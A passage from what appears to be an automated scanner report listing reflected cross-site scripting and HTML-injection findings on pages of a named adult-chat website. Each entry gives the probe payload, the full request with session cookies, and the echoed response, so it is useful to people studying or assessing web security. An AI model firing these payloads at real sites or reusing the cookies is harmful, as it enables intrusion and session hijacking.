The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a77"><a>b24d1216ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:02 GMT Connection: close Content-Length: 24983 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.83. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/free-sex-video-for-ipod/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5370e"><a>3222e16e08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:12 GMT Connection: close Content-Length: 73010 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.84. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/free-sex-video-for-ipod/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daba9'-alert(1)-'82614b3e5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 73157 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.85. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/free-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11eb'-alert(1)-'f3d704a6f4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 52326 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.86. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/free-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26eb"><a>443e0c98ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 52111 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.87. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/gay-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20260"><a>39ff4f914a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:49 GMT Connection: close Content-Length: 34182 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1"> ...[SNIP]...
2.88. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/gay-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2072'-alert(1)-'fe8b9fbca10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:59 GMT Connection: close Content-Length: 34366 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.89. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/gay/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b640"><a>ffa3e1dc7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:00 GMT Connection: close Content-Length: 195797 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1"> ...[SNIP]...
2.90. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/gay/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cfa'-alert(1)-'0c9972c192e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; 